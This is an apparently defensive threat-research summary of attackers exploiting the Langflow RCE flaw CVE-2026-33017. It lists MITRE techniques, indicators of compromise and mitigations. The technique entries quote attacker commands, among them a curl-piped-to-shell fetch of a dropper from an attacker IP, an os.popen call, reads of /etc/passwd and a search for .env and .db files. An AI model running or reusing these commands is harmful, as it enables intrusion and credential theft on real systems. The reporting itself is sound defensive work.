Threat Research

CVE-2026-33017: How attackers compromised Langflow AI pipelines in 20 hours

Sysdig
CVE-2026-33017: How attackers compromised Langflow AI pipelines in 20 hours

CVE-2026-33017 is an unauthenticated remote code execution flaw in Langflow’s public flow build endpoint that attackers weaponized within ~20 hours of disclosure to execute arbitrary Python and exfiltrate credentials. Sysdig’s honeypots recorded rapid, multi-stage exploitation—nuclei-based scanning, custom Python exploit scripts, and staged dropper/C2 infrastructure—that harvested environment variables, .env files, and database artifacts. #Langflow #CVE-2026-33017

Keypoints

  • The vulnerability (CVE-2026-33017) is an unauthenticated RCE in Langflow’s POST /api/v1/build_public_tmp/{flow_id}/flow endpoint that executes attacker-supplied Python in node definitions without sandboxing.
  • Working exploits were observed ~20 hours after the advisory, despite no public PoC, demonstrating attackers built exploits directly from the advisory text.
  • Sysdig’s honeypots recorded three exploitation phases: rapid nuclei-based automated scans, custom Python exploit reconnaissance and stage-2 delivery, then targeted credential harvesting and data exfiltration.
  • Attackers exfiltrated environment variables, .env files, and database files, and used pre-staged infrastructure (dropper at 173.212.205.251:8443 and C2 at 143.110.183.86:8080) for payload delivery and data collection.
  • Indicators point to both privately authored nuclei templates for mass scanning and custom exploit scripts that progressed from validation to active compromise in a single session.
  • Runtime detection (system-call and behavior-based rules) is essential for day-zero defense because the patch window from disclosure to weaponization is now often measured in hours.
  • Practical mitigations include updating Langflow or restricting/disabling the public flow build endpoint, rotating exposed credentials, applying network segmentation/firewalls, and monitoring for outbound callbacks to known DNS/interaction services.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The vulnerability is an unauthenticated RCE in a public endpoint allowing remote code execution (‘CVE-2026-33017 is an unauthenticated remote code execution (RCE) in the public flow build endpoint’).
  • [T1059.006] Command and Scripting Interpreter: Python – Attackers executed Python on the server (including os.popen usage) to run shell commands (‘_r = __import__(‘os’).popen(‘id’).read()’).
  • [T1105] Ingress Tool Transfer – Stage-2 payloads were retrieved from attacker infrastructure using curl and piped to sh (‘bash -c “$(curl -fsSL http://173.212.205.251:8443/z)”‘).
  • [T1083] File and Directory Discovery – Attackers enumerated directories and files to locate secrets and databases (‘ls -al /root; ls /app; cat /etc/passwd’ and ‘find /app -name “*.db” -o -name “*.env”‘).
  • [T1082] System Information Discovery – Adversaries fingerprinted the environment to identify user and system context (‘id (returned uid=1000(langflow))’).
  • [T1552.001] Credentials in Files – Attackers harvested credentials from application files and environment files (‘.env files containing application secrets’ and ‘Environment variable dump: Executed env to capture the full process environment’).
  • [T1041] Exfiltration Over C2 Channel – Collected data was encoded and sent to attacker-controlled callback/C2 servers (‘exfiltrates it to an interactsh callback server’ and ‘Receives base64-encoded exfiltration’).
  • [T1071.001] Application Layer Protocol: Web Protocols – Exfiltration and C2 used HTTP-based callbacks and web protocols for communication (outbound connections to ‘143.110.183.86:8080’ and HTTP POST payloads to the vulnerable endpoint).
  • [T1071.004] Application Layer Protocol: DNS – Scanning/exfiltration leveraged DNS/interaction domains (DNS lookups and callbacks to .oast.* interactsh subdomains and references to ‘oastify.com’ in detection rules: ‘DNS Lookup for Offensive Security Tool Domain Detected’).

Indicators of Compromise

  • [IP Address ] source scanning and exploitation – 77.110.106.154 (nuclei scan), 83.98.164.238 (custom exploit/recon)
  • [IP:Port ] C2 and dropper infrastructure – 143.110.183.86:8080 (C2 receiving base64 exfiltration), 173.212.205.251:8443 (dropper host serving /z)
  • [Domain / Subdomain ] interactsh/OAST callback domains used for exfiltration – d6tcpc6flblph01gdcb0ku9ixih393m54.oast.live, d6tcpe7nsv6kk9rdrpggi37zmjfxw9imr.oast.me, and other ephemeral subdomains (and ~9 more observed)
  • [URL ] dropper and callback URLs – http://173.212.205.251:8443/z (stage-2 dropper), http://143.110.183.86:8080/ (C2 endpoint)
  • [File paths / filenames ] targeted sensitive files and search patterns – .env, /etc/passwd, and find queries for ‘*.db’ files
  • [HTTP Header / Cookie ] scanner identification and flow naming – Cookie: client_id=nuclei-scanner and flow name ‘nuclei-cve-2026-33017’ observed in exploit requests

Read more: https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours